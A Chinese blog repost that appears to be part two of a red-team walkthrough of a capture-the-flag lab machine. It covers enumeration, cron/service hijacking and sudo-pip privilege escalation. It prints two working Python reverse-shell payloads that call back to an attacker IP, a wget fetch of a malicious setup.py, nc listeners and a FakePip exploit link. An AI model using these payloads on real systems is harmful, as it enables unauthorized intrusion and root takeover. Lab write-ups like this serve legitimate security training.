首页 网络安全 渗透测试 查看内容

记一次红队渗透实战项目(下)

2023-2-3 21:09 3501 0

摘要: 赋权并执行脚本,linpeas.sh信息枚举:chmod +x linpeas.sh./linpeas.sh发现如下新信息:发现新用户是1002,说明包含了2个权限uid=1001(devops) gid=1002(developer) groups=1002(developer)root权限pip,PIP是Pytho ...
关键词: devops 枚举 脚本 socket antivirus 用户 权限 运行 发现 反弹

赋权并执行脚本,linpeas.sh信息枚举:

chmod +x linpeas.sh./linpeas.sh

发现如下新信息:

发现新用户是1002,说明包含了2个权限
uid=1001(devops) gid=1002(developer) groups=1002(developer)

root权限pip,PIP是Python包或模块的包管理器,包含模块所需的所有文件
rwxr-sr-- 1 root developer 281 Feb 27 2015 /usr/bin/pip

3、find深入枚举

1)mamadou用户信息枚举

利用find针对mamadou查看可运行权限文件:

/   ---反斜杠从根目录开始查询-user mamadou  ---搜索普通该用户权限的文件2>&1   ----将所有错误信息重定向不输出过滤掉-v   ---就是过滤错误的输出

发现flag1:

cat /home/mamadou/flag1.txt

Flag : d86b9ad71ca887f4dd1dac86ba1c4dfc

2)devops用户信息枚举

通过前面脚本枚举还发现存在另一个用户:devops,也利用find针对devops查看其可运行权限文件:

find / -user devops 2>&1 | grep -v "Permission denied\|proc"

返回三个信息,具体查看下

/srv/.antivirus.py/tmp/test/home/devops/flag2.txt

这里返现三个可疑信息:

尝试打开flag2.txt:

cat /home/devops/flag2.txt

提示无权限打开!

尝试打开antivirus.py:

cat /srv/.antivirus.py

发现这是一个可读可写的python脚本!

open('/tmp/test','w').write('test')

查看下antivirus是否存在计划任务启动该脚本:

find / -name *antivirus* 2>&1 | grep -v "Permission denied\|proc"

发现存在antivirus.service服务!

查看下该服务内容:

cat /lib/systemd/system/antivirus.service

提示存在该服务存在计划任务,每5分钟devops用户执行一次

RestartSec=300   ---300秒运行一次User=devops      ---这是devops用户运行

接下来利用该计划任务来编译反弹shell!

六、计划任务反弹shell

1、写入计划任务

本地开启nc端口:

nc -tvlp 9999

nano写入反弹shell

nano /srv/.antivirus.py写入以下shell:#!/usr/bin/pythondef con():	import socket, time,pty, os	host='192.168.40.177'	port=9999	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)	s.settimeout(10)	s.connect((host,port))	os.dup2(s.fileno(),0)	os.dup2(s.fileno(),1)	os.dup2(s.fileno(),2)	os.putenv("HISTFILE",'/dev/null')	pty.spawn("/bin/bash")	s.close()con()

等5分钟成功反弹devops 用户shell!

七、内部信息枚举–devops

1、组信息枚举

cat /etc/group

developer
1002: —可看到还存在group组里的developer

2、find查看权限文件

利用find针对developer 查看可运行权限文件:

find / -group developer 2>&1 | grep -v "Permission denied\|proc"

发现存在:/usr/bin/pip 可运行文件和flag2

3、获取flag

cat /home/devops/flag2.txt

Flag 2 : d8ce56398c88e1b4d9e5f83e64c79098

在整个目录中枚举devops:

grep -rn / -e devops 2>&1 | grep -v "Permission denied\|proc"

没发现新的东西,但是可看到devops的ID为1002是共用的!

/etc/subgid:11:devops:755360:65536/etc/group:56:devops:x:1001:/etc/passwd:29:devops:x:1001:1002:,,,:/home/devops:/bin/bash/etc/subuid:11:devops:755360:65536

4、sudo提权

尝试sudo提权:

sudo -l

提示用户可以在/usr/bin/pip执行sudo

User devops may run the following commands on Wakanda1: (ALL) NOPASSWD: /usr/bin/pip

八、pip提权

pip可执行sudo提权,那就利用pip写入py脚本运行

开启nc反弹shell:

nc -vlp 4455

本地添加设置脚本setup.py:

将host更改为本地kali地址,端口随拟。

gedit setup.py写入以下py脚本:from setuptools import setupimport socket,subprocess,osdef con():	import socket, time,pty, os	host='192.168.40.177'	port=4455	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)	s.settimeout(10)	s.connect((host,port))	os.dup2(s.fileno(),0)	os.dup2(s.fileno(),1)	os.dup2(s.fileno(),2)	os.putenv("HISTFILE",'/dev/null')	pty.spawn("/bin/bash")	s.close()con()setup(name="root", version="1.0")

配置成功!

到tmp目录下上传setup.py脚本至靶机:

cd /tmpwget http://192.168.40.177:8081/setup.py

上传成功!

sudo运行脚本setup.py:

sudo pip install setup.py .

成功获得反弹shell!

获得flag:

cd /root cat root.txt

flag:821ae63dbe0c573eff8b69d451fb21bc

提权pip:拓展思路

poc:[https://github.com/0x00-0x00/FakePip](https://github.com/0x00-0x00/FakePip)

用代理下载FakePip包:

proxychains git clone https://github.com/0x00-0x00/FakePip.git

下载成功!

查看脚本机制并配置参数:

cd FakePip   cat setup.pygedit setup.py

将lhost改为本地kali地址,端口可不变:

192.168.40.17713372

本文出处: https://www.toutiao.com/article/7194348346100826663/
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部